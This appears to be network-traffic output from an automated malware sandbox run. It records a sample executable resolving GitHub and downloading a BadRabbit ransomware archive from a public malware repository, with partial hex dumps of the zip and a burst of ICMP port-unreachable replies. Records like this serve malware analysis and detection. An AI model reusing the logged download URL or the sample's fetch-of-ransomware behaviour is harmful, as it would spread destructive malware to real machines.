Sep 29, 2022 14:50:48.181458950 CEST	87.98.179.104	192.168.2.6	ca9d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.181622982 CEST	87.98.179.118	192.168.2.6	caab	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.181693077 CEST	87.98.179.112	192.168.2.6	caa5	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.181813955 CEST	87.98.179.113	192.168.2.6	caa6	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.181930065 CEST	87.98.179.115	192.168.2.6	caa8	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.182101965 CEST	87.98.179.123	192.168.2.6	caa9	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:48.182131052 CEST	87.98.179.125	192.168.2.6	cab2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.183258057 CEST	87.98.179.137	192.168.2.6	cabe	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.183613062 CEST	87.98.179.135	192.168.2.6	cabc	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.183759928 CEST	87.98.179.142	192.168.2.6	cac3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.183800936 CEST	87.98.179.136	192.168.2.6	cabd	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.184842110 CEST	87.98.179.149	192.168.2.6	caca	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.185585022 CEST	87.98.179.159	192.168.2.6	cacd	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:48.185926914 CEST	87.98.179.155	192.168.2.6	cac6	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:48.186295986 CEST	87.98.179.162	192.168.2.6	cad7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.187839031 CEST	87.98.179.160	192.168.2.6	cad5	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.281398058 CEST	87.98.179.166	192.168.2.6	cadb	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.282172918 CEST	87.98.179.164	192.168.2.6	cad9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.282964945 CEST	87.98.179.171	192.168.2.6	cae0	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.283513069 CEST	87.98.179.173	192.168.2.6	cae2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.287664890 CEST	87.98.179.188	192.168.2.6	caf1	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.287782907 CEST	87.98.179.187	192.168.2.6	caf0	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.288639069 CEST	87.98.179.189	192.168.2.6	caf2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.289563894 CEST	87.98.179.196	192.168.2.6	caf9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.290946960 CEST	87.98.179.199	192.168.2.6	cafc	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.291728020 CEST	87.98.179.201	192.168.2.6	cafe	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.292356968 CEST	87.98.179.206	192.168.2.6	cb03	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.296838045 CEST	87.98.179.210	192.168.2.6	cb07	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.296858072 CEST	87.98.179.213	192.168.2.6	cb0a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.297039986 CEST	87.98.179.214	192.168.2.6	cb0b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.297498941 CEST	87.98.179.216	192.168.2.6	cb0d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.297764063 CEST	87.98.179.218	192.168.2.6	cb0f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.298075914 CEST	87.98.179.222	192.168.2.6	cb13	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.298237085 CEST	87.98.179.223	192.168.2.6	cb14	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.298517942 CEST	87.98.179.220	192.168.2.6	cb11	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.298588037 CEST	87.98.179.221	192.168.2.6	cb12	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.305366039 CEST	87.98.179.232	192.168.2.6	cb1d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.305902004 CEST	87.98.179.229	192.168.2.6	cb13	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:48.306788921 CEST	87.98.179.230	192.168.2.6	cb1b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.397404909 CEST	87.98.179.242	192.168.2.6	cb27	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.397478104 CEST	87.98.179.240	192.168.2.6	cb25	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.399180889 CEST	87.98.179.246	192.168.2.6	cb2b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.399230003 CEST	87.98.179.245	192.168.2.6	cb2a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.400240898 CEST	87.98.179.251	192.168.2.6	cb30	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:49.432476997 CEST	87.98.179.255	192.168.2.6	cb34	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 29, 2022 14:49:48.360481024 CEST	192.168.2.6	8.8.8.8	0x4e9	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Sep 29, 2022 14:49:48.983381987 CEST	192.168.2.6	8.8.8.8	0xca79	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 29, 2022 14:49:48.382462978 CEST	8.8.8.8	192.168.2.6	0x4e9	No error (0)	github.com	140.82.121.4	A (IP address)	IN (0x0001)	false
Sep 29, 2022 14:49:49.000629902 CEST	8.8.8.8	192.168.2.6	0xca79	No error (0)	raw.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)	false
Sep 29, 2022 14:49:49.000629902 CEST	8.8.8.8	192.168.2.6	0xca79	No error (0)	raw.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)	false
Sep 29, 2022 14:49:49.000629902 CEST	8.8.8.8	192.168.2.6	0xca79	No error (0)	raw.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)	false
Sep 29, 2022 14:49:49.000629902 CEST	8.8.8.8	192.168.2.6	0xca79	No error (0)	raw.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

github.com

raw.githubusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49718	140.82.121.4	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	Direction	Data
2022-09-29 12:49:48 UTC	OUT	GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1 Host: github.com Connection: Keep-Alive
2022-09-29 12:49:48 UTC	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Thu, 29 Sep 2022 12:48:20 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: https://render.githubusercontent.com Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-29 12:49:48 UTC	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49719	185.199.108.133	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:49:49 UTC	2	OUT	GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2022-09-29 12:49:49 UTC	2	IN	HTTP/1.1 200 OK Connection: close Content-Length: 402632 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/zip ETag: "004f09a50a54351833511d1b99db3436b26a72d8e149d6c13dd20a27fe83f3a9" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 081E:1220:100920B:1104BA2:633592FF Accept-Ranges: bytes Date: Thu, 29 Sep 2022 12:49:49 GMT Via: 1.1 varnish X-Served-By: cache-mxp6942-MXP X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1664455789.067349,VS0,VE162 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * X-Fastly-Request-ID: 98568e9d6ba1c33abf49b41b7ff3e74df9c527af Expires: Thu, 29 Sep 2022 12:54:49 GMT Source-Age: 0
2022-09-29 12:49:49 UTC	3	IN	Data Raw: 50 4b 03 04 14 00 01 00 08 00 81 a9 58 4b a5 c9 a1 5f 12 24 06 00 2b be 06 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 61 64 52 61 62 62 69 74 2e 65 78 65 01 be e1 49 53 97 20 1c fa c3 6c 18 29 d1 f4 f7 b9 c1 0f c2 9d 6d e2 a3 7f 5f 80 37 a1 bf 46 53 1e 79 43 c5 68 f0 2d 6f a5 6c bc 0b d3 34 e8 37 46 4f 1d 09 b7 a5 d6 3f 8f 58 ab 3e 2a 6b e8 1c 51 80 2f 2b 06 5f 55 e5 78 40 db b9 ba f4 53 46 d8 d7 32 07 89 19 21 37 5e 46 a7 76 3d 2e 65 bc d2 d4 da f9 17 a2 91 f7 2a 17 53 56 14 07 fc 80 61 6e be 20 45 b9 a6 61 66 fa 0e e1 ab 52 4b 8f 7a 5f 56 4d 81 a4 45 ec fb 8c c3 9b b1 0c 2c 9f ac be 4e 92 81 00 98 1f 9a 78 44 7b 7e 07 bf be 1f 74 1e c3 72 cc ca b4 be 8c f1 ec 6f e7 14 34 c2 be ff d4 80 dc 69 5f 70 f5 e0 9e cf 53 02 80 3a 32 88 09 e4 9a 07 df 28 Data Ascii: PKXK_$+Endermanch@BadRabbit.exeIS l)m_7FSyCh-ol47FO?X>kQ/+_Ux@SF2!7^Fv=.eSVan EafRKz_VME,NxD{~tro4i_pS:2(
2022-09-29 12:49:49 UTC	19	IN	Data Raw: 72 c8 31 c2 9d f7 2e 41 53 ac c7 27 ce 6b c8 aa ef 81 64 8e b4 61 a3 68 c9 b2 4f 51 0f 0c d0 0b 4c 71 6f ed 6f 20 9a 1c 07 c1 6d 4b ad 82 2e 0c d8 76 e0 4e c7 34 dc 23 56 fe 18 59 7d 9d 34 7a 07 81 2e 22 f6 07 d6 af 92 93 9e 99 79 2c 0b b5 1d 5d 9f 43 60 6b 35 90 10 b0 c8 29 dc 00 bb 73 51 54 95 38 6c 8c 8f 1a 0c 72 e7 4d 5b b9 96 5b f8 d4 55 f8 09 c0 2a 6f 2d 76 fb 69 8d 7a f1 e9 d7 35 17 79 fe 2e 8d 55 4d c4 34 a7 1b 02 fe 6e da 8b 97 a7 6e 37 9d 8e cd ae 2b 76 01 4d 9e 15 87 c4 e4 66 02 e2 98 84 31 d0 d4 14 3d 69 e4 12 90 c3 81 a2 a1 71 8a 43 d3 5b c6 fb 0f 0a 40 50 0f e0 8e 4a 58 d9 62 7b 0b 99 1d df 17 a6 67 a8 30 f0 a7 69 b9 75 d6 77 57 ef e2 8b a1 25 9f 21 41 dd f6 20 66 52 70 20 57 c0 71 32 bf ee 40 86 cb d3 32 03 76 87 d4 20 f2 0c 0a 9e 32 dd 55 Data Ascii: r1.AS'kdahOQLqoo mK.vN4#VY}4z."y,]C`k5)sQT8lrM[[U*o-viz5y.UM4nn7+vMf1=iqC[@PJXb{g0iuwW%!A fRp Wq2@2v 2U
2022-09-29 12:49:49 UTC	35	IN	Data Raw: df 68 45 73 e0 48 d9 9a 68 44 7f cf 25 7e 2c f7 a7 f0 68 54 12 ed d0 2a 22 31 10 ac a1 e1 77 4c 42 a9 31 71 f8 97 16 75 01 a1 1e e1 e1 17 fe 10 23 57 f6 34 80 ff 56 f2 aa 8a 75 ce 91 d4 8c 17 b0 44 67 6d fb 81 09 a0 08 4a fe 24 1e 2f a0 22 14 da d0 bb eb 65 1c fe 98 44 82 fc 8d e5 aa 15 d7 39 42 ae ee c7 8d d4 a1 d4 02 21 3b 0b 24 38 c4 0b d7 38 98 f6 c4 fc a6 80 1d 85 23 73 a9 a9 15 94 27 53 8a 2e 99 55 5e d4 a2 78 66 8e 6d d4 f6 02 ed 7e 13 40 15 8b b9 82 b2 dd 13 fb f0 5b 1e 54 0f 2e 43 8b ca 26 60 fe a3 8e 21 1a fa df 98 d7 6a 59 63 d7 16 27 df f6 07 fe 81 80 1b f1 18 90 3b 3d 7f 64 eb 30 2b d7 59 85 a0 c7 bf 41 be d8 4a d4 0e bd 61 31 21 ea 8f c9 86 ad 0f 6b 39 52 a9 14 fd f1 7d 1f fc 66 70 5c b7 2a 1f d3 7d 54 f2 17 8e a5 98 7e 5b 75 54 c0 49 10 62 Data Ascii: hEsHhD%~,hT"1wLB1qu#W4VuDgmJ$/"eD9B!;$88#s'S.U^xfm~@[T.C&`!jYc';=d0+YAJa1!k9R}fp\}T~[uTIb
2022-09-29 12:49:49 UTC	51	IN	Data Raw: c3 a0 6b 5f 9d ce 11 cf 59 14 7f b2 aa 14 34 99 4d ce 0c a5 85 81 79 45 d1 74 4a 6f 00 aa e4 8c 0e 69 de 4e 90 e7 67 97 7d 3a d9 6b f2 d5 9a 38 fb 8f f7 c0 52 ae 61 47 33 08 16 e3 39 ee ee c8 96 3c 11 6c 39 ba 9a b8 7a 07 c4 d8 f2 f7 97 b1 15 17 ff a2 1a dd f1 7e 85 38 2f 9d e5 80 f3 9f b3 d8 5b 23 1b 2a 83 4b d6 52 de b1 99 e2 e9 f5 41 77 0e 1b 02 6f 18 79 c1 5a 06 84 21 c6 39 b2 28 51 0d e3 1a 6a 8a 22 b1 52 ba 7f a3 10 23 0f 18 f4 9b 7f 22 38 8a 2e 9b cb 3a b1 01 19 21 17 c9 ec 7d 6a a8 f1 4a 1b 2a a1 1f b8 83 72 e1 9b ef eb ae 43 20 62 15 6e 87 c4 84 92 cc 79 4c 84 fa b4 10 67 22 48 cd b7 58 d7 8a 11 c3 48 64 fd 1f f6 92 0a ce f6 1a 5f 92 30 a1 92 09 2d 29 75 d9 45 d3 73 d6 61 82 68 6f d7 f8 a1 50 01 d4 f6 b9 38 c0 2f 02 24 0f 42 83 46 db bc b6 e2 80 Data Ascii: k_Y4MyEtJoiNg}:k8RaG39<l9z~8/[#KRAwoyZ!9(Qj"R#"8.:!}jJrC bnyLg"HXHd_0-)uEsahoP8/$BF
2022-09-29 12:49:49 UTC	67	IN	Data Raw: d3 e8 b3 a5 57 bb 0f 80 8e 4a d0 94 cd 31 b7 fc 52 9b dd ec 1d 0e df e2 b2 72 10 11 45 d0 13 e7 46 73 0e ee 88 25 59 a0 87 52 2a 7f f1 c9 04 38 b2 8a 86 e3 55 b0 df 6d 8e 1c 77 b0 01 ac 10 05 04 6b ae 2b 3b 5e bf 4a ed 73 d8 ab d3 cf fb a8 6e a2 bc 4f 41 2d c4 15 83 39 f0 dd 86 d1 ca 20 b5 c3 a8 59 39 4c 02 66 11 12 8e 3d b1 f1 60 78 f2 6b e1 ac 59 82 ea 00 59 c1 52 94 4e 15 f8 64 8a cb b7 a7 02 ac 35 7d a2 41 76 da e4 c6 75 30 50 5a d7 bc ec 8f b5 23 13 c9 ba fb ef 45 7f eb 5a e2 8f 23 36 26 7f 40 df 34 a3 e1 62 b2 12 aa ad e7 23 b5 ca 8b 71 b0 44 0a 27 af dd 1e 19 7d 21 dd be 40 7a 66 f1 99 77 2e 7c dc 11 fd 78 b3 18 30 1a e9 85 ba 8d ad 5b f5 01 38 d7 04 ee 9a 7d 9b 2d 3a 21 53 ff 71 58 63 ea e3 5d 5b aa d2 86 cf c9 f7 50 41 78 22 be a2 af af 77 21 ea Data Ascii: WJ1RrEFs%YR*8Umwk+;^JsnOA-9 Y9Lf=`xkYYRNd5}Avu0PZ#EZ#6&@4b#qD'}!@zfw.\|x0[8}-:!SqXc][PAx"w!
2022-09-29 12:49:49 UTC	83	IN	Data Raw: 9f 8c 81 5a e1 61 65 95 8f cc a2 6e e0 37 5b 40 bf cf de df 7f 30 4e c4 a4 a4 14 6c a5 a4 3e 3b 32 39 ff 30 2f c3 ed af 76 75 0a a1 44 6b d1 d5 e7 ce 30 e9 f3 b2 51 21 30 02 31 4a 3a f3 7d 4c 47 9f 37 81 61 20 f0 24 e0 40 e2 f4 11 69 06 c1 e5 da 68 f6 69 da f1 a8 6a f0 d5 a3 85 b1 b1 09 83 b7 cb 7a 5c 58 d7 9d 8e c4 83 37 08 26 88 ca 0b bd 39 13 32 c4 8f 4a 58 c4 bc bb b9 ec bb fd 1a 09 ac ed 3b 04 a3 46 1a ed 64 16 1a f8 bd ba 5e d2 6b cb 90 6c 03 35 4f 84 50 70 ad 4a d0 df 47 d5 45 6b af 9d d4 e0 9b 68 3f 90 45 96 04 05 49 ea 2d 74 67 09 3f f6 24 51 df 6c 99 ec c5 8c f6 9d 59 93 1f 24 5d 0c 81 bb 8a c2 bc 3b 5d 69 ba 18 5e f1 aa 37 5c a9 5b d7 6f 6c 1c ba 02 d0 af 63 c7 70 af 52 c8 45 95 ee 6b 4d 68 57 cc c4 33 db 39 a3 05 b7 b7 6e 10 0b 85 9f aa 69 12 Data Ascii: Zaen7[@0Nl>;290/vuDk0Q!01J:}LG7a $@ihijz\X7&92JX;Fd^kl5OPpJGEkh?EI-tg?$QlY$];]i^7\[olcpREkMhW39ni
2022-09-29 12:49:49 UTC	99	IN	Data Raw: 11 1b be 72 2a 9b ac 24 a6 6f d8 66 50 56 81 1f 92 36 08 2a 93 7a dd 7d 06 0e 44 95 94 0a 7e 98 74 6f fa db 94 31 1c c4 1f b4 1d 86 a4 a1 d1 e1 40 d4 9d ad 4b 7d 69 4c f8 2b 15 ac 29 1f c3 92 8c 8c c3 d5 39 a7 cb ce 0a 54 1b 9c 7a 06 85 95 e4 1f a6 6d 48 ba d3 e7 ec e4 f7 d9 e6 03 bf ea e1 48 7f fc 76 cd 8d e7 d5 6f 81 b0 40 29 89 24 11 52 7a c4 89 a8 dd ca 01 9b 14 cd 66 89 e5 5b 32 ef 55 90 2d 79 f7 ae 4f 50 2c 2d 9d da a7 a3 ee f8 e5 2e 08 2d 9f e0 7e 3e 38 67 38 30 2a 9c de 08 b3 ba aa 0d da 44 d4 22 04 bc 5f 6b 86 76 73 da 6a 0c 5c c5 7f 72 5e 25 dc 19 fa 32 9a 0d b2 94 07 a0 01 18 eb a7 77 02 48 54 66 d4 06 42 86 45 c6 28 97 b7 29 76 b6 e9 77 3d ec 66 42 ba bb 7d 87 b2 e0 b3 26 05 14 57 20 e7 ed 14 2e b6 0b 80 70 2b 3c d2 30 8d 0b 60 28 c3 23 b3 31 Data Ascii: r$ofPV6z}D~to1@K}iL+)9TzmHHvo@)$Rzf[2U-yOP,-.-~>8g80*D"_kvsj\r^%2wHTfBE()vw=fB}&W .p+<0`(#1
2022-09-29 12:49:49 UTC	115	IN	Data Raw: 4c 03 ef 99 74 d7 04 e0 e0 eb 91 00 43 79 ac f2 18 2a f3 47 5c d6 d7 27 b0 25 da 87 01 ba 70 e4 5a ff 63 9d d6 b7 ae d1 3c 37 78 cb a8 7f b9 75 b1 29 51 83 cb 06 19 40 74 c2 3b a8 21 2d 7e 8d 82 40 19 00 9f e0 6f 41 20 76 0a a7 3a a1 e5 90 94 2e 75 f5 05 9f 6a 18 d2 46 7a e2 78 47 0c 9c ac 7c 38 b9 3a c9 63 9a a9 2a 81 83 a3 45 01 b0 55 f6 81 42 82 16 05 e0 a3 b3 3e 51 e1 af 65 81 69 99 94 a2 4f 08 0e 28 5f c1 e8 85 9c 79 f3 99 b6 11 eb 2d 99 23 be 0b d0 2a 65 12 97 15 6f a3 57 3b 09 1a 94 1e 0f e4 c6 12 87 fb aa 4b 26 7d e0 e3 40 ba 57 4d ee 09 67 a3 a0 19 71 43 ac bf 27 71 d4 ef 7c 09 e3 7e 45 fe a1 00 d9 c7 41 71 79 0b 2c ad 50 7f c3 31 25 2d 2f 1c 3f a5 b0 43 5a c4 8c f2 72 70 fe 91 a4 53 8d 0e cc 34 f2 2c 8e ce 3a 82 07 4a fd 47 4f 20 c4 80 fe 78 e6 Data Ascii: LtCyG\'%pZc<7xu)Q@t;!-~@oA v:.ujFzxG\|8:cEUB>QeiO(_y-#*eoW;K&}@WMgqC'q\|~EAqy,P1%-/?CZrpS4,:JGO x
2022-09-29 12:49:49 UTC	131	IN	Data Raw: a6 bf 07 22 95 8f 84 94 f9 f2 00 f4 0d f9 f4 e9 ab 4a 6a aa a8 af e8 ce d6 75 e0 e4 13 2f 28 e3 71 79 43 65 a2 dc 48 b3 74 9a ab e5 6f df 91 5f 22 88 d4 20 57 c7 d6 53 06 78 a9 21 9f 02 23 7d e4 59 1f c2 93 37 e8 9e da 71 57 25 8c ba c2 c4 79 44 67 a5 de c3 e9 47 e8 65 79 14 d4 92 2d 63 2d 75 0b 89 a3 8f c7 ab 8b d4 c5 8d 41 f4 03 b0 e1 e5 ec 74 82 a7 60 43 12 cd 63 97 34 81 68 24 b0 c9 15 f9 ad b8 c8 24 b4 c6 de d5 d7 05 bd 03 f7 6e b9 6f bc e5 8a 54 38 77 b7 b4 e2 bd a3 d9 3f 83 d9 42 8b fc a4 6d e0 91 ac 50 c7 ea e8 47 50 75 88 23 37 cd 02 fc 48 24 97 e7 3b 34 22 92 bd 19 16 1f 42 f8 06 c4 d9 a3 88 b1 70 7f 5c 0e d7 28 f2 43 2c b1 92 65 80 85 7a a6 a1 6d 73 c1 c7 38 3a fb c6 ef e5 98 35 22 37 b4 9c b9 68 a1 22 75 eb c7 e3 e4 74 fa 7f c8 f2 b5 98 16 ed Data Ascii: "Jju/(qyCeHto_" WSx!#}Y7qW%yDgGey-c-uAt`Cc4h$$noT8w?BmPGPu#7H$;4"Bp\(C,ezms8:5"7h"ut
2022-09-29 12:49:49 UTC	147	IN	Data Raw: 5e 17 75 6c b3 25 52 16 be 6b cf 2f 3b 84 7a 4f 54 34 3b 54 7c 87 fc 4d df e5 3a 95 42 56 ce c9 3e 90 0a 0b 3c 46 db 0d 38 e7 ea f2 18 b5 cf 4e 58 24 da d8 2f 04 e3 68 58 66 28 6e e1 1f a4 6b 82 f5 5c a5 37 ee 55 3f 21 6a 76 dd f3 aa f5 b0 39 c4 e5 11 15 c1 3a d4 eb e0 92 3a 9c 27 40 2b d2 a0 ae 4e fe 70 be d0 12 fc 5b cc 92 99 5c 2e be 14 e1 1e fd 43 7f f1 b3 64 a6 24 11 d1 93 94 4e ac 26 fe 9b 8a f3 95 b7 ba 6c 50 41 e3 8c b6 19 51 66 ae a9 70 a0 55 63 36 69 87 e6 d7 cc f4 56 9e fc a7 c3 26 7b ce 62 2e 69 99 e1 6d ab c0 da 7d d4 8c 28 2a 46 51 04 70 84 f3 46 d6 24 44 1f 4b 21 99 5c 43 29 c0 f5 4b b4 51 cd 91 f5 fb 2d f8 ec 50 28 19 63 d2 3d 75 a9 d5 58 8f b1 f6 5b d6 da 8c 50 5a eb 7a 9e 1b 8f 72 2a 12 cd 5f d1 27 32 74 28 1b f9 31 29 82 cd e6 8a 89 5e Data Ascii: ^ul%Rk/;zOT4;T\|M:BV><F8NX$/hXf(nk\7U?!jv9::'@+Np[\.Cd$N&lPAQfpUc6iV&{b.im}(FQpF$DK!\C)KQ-P(c=uX[PZzr_'2t(1)^
2022-09-29 12:49:49 UTC	163	IN	Data Raw: a1 20 33 b9 bc 0f 2d 4e e4 00 ff 62 35 f6 95 ca cd 09 9f 09 89 a6 52 2d e9 b4 39 1a ca fa f3 cb 0e fd 04 46 f2 e0 25 20 49 bb 66 e4 bd 4a c1 76 bb a5 05 1e e4 d3 02 09 b2 5d f8 86 48 d2 8d 6f e4 62 e9 31 8b ce 64 18 5c dd 0c e0 56 9b a1 44 29 4e 19 4c 8a 3e f2 77 0f e8 ed bd 61 7c ac 55 6e 1a a8 72 90 08 67 f5 96 57 55 bd d9 16 71 e2 bf f5 b9 70 80 9d 01 11 bb 8f f3 35 fa 3d b4 3a 03 7f 03 de 61 5c 3e 35 ce c3 c7 83 c7 b4 9d 09 48 49 55 2e 3b af 9a c0 35 7e b2 00 d6 d7 93 e9 7a 93 e6 2f c3 e4 5f 8f 7c 2d 61 90 54 ed 67 e8 8d d0 a5 28 ab b7 09 39 90 b1 cc 90 d7 d6 ae 5f b8 f4 71 4a fd b3 c6 86 6b f7 c7 29 3f cb f1 c5 e7 f4 a9 79 f4 f6 5d 76 a0 82 ef 0a 9a 89 37 d1 25 ac 05 03 d0 ba 88 f3 ae de 7c d5 5c 7f e6 2d c0 a1 c3 93 12 b7 3d 82 bc c4 86 41 3c fc 60 Data Ascii: 3-Nb5R-9F% IfJv]Hob1d\VD)NL>wa\|UnrgWUqp5=:a\>5HIU.;5~z/_\|-aTg(9_qJk)?y]v7%\|\-=A<`
2022-09-29 12:49:49 UTC	179	IN	Data Raw: b7 ba 56 66 0c bc e3 9e 76 70 03 46 37 25 20 fb ea bf 06 bf f6 ae 71 db d3 d0 a3 52 4a d3 23 c9 b8 98 9a b9 da 3c 4b 10 c3 d4 f4 dd 7d 53 37 a0 0d cf 67 d9 97 19 6d 33 c6 6e 65 a1 a5 c3 0e bd c2 fe ab 79 ae 90 06 8e 80 90 45 41 87 0a 7c 18 88 96 92 8b 9e 70 5d 8f 0e fd f3 2f b0 14 69 ec 72 f6 dc fa f0 18 68 59 ce 81 fd d6 ed 16 ba f5 4f e5 bf bf 9f 6e 81 89 12 83 97 ac a3 12 d8 52 3c 9b 41 b8 3c f9 39 3c df 8a 81 30 fd ff 81 d1 68 2b b2 8e d4 16 6e 6e ee 3f 9a 53 3a ae a9 08 ef 41 10 ab 64 8b 81 1c 2f 2d 13 7e ad 74 6f 1f 6e e1 bb 72 d6 13 bb a1 72 a3 52 51 e5 b7 89 ac 7c c4 98 1e 97 c1 23 4e 51 b8 fe 3c 0e d9 6c d1 8c 31 26 c4 0b e3 8e 76 4a 04 f3 ff 70 b8 87 00 30 5d 17 49 84 e2 02 59 eb 05 16 23 5a 56 ab 58 89 5b 6a a4 7c c3 21 1e a2 0a d4 b6 98 db f4 Data Ascii: VfvpF7% qRJ#<K}S7gm3neyEA\|p]/irhYOnR<A<9<0h+nn?S:Ad/-~tonrrRQ\|#NQ<l1&vJp0]IY#ZVX[j\|!
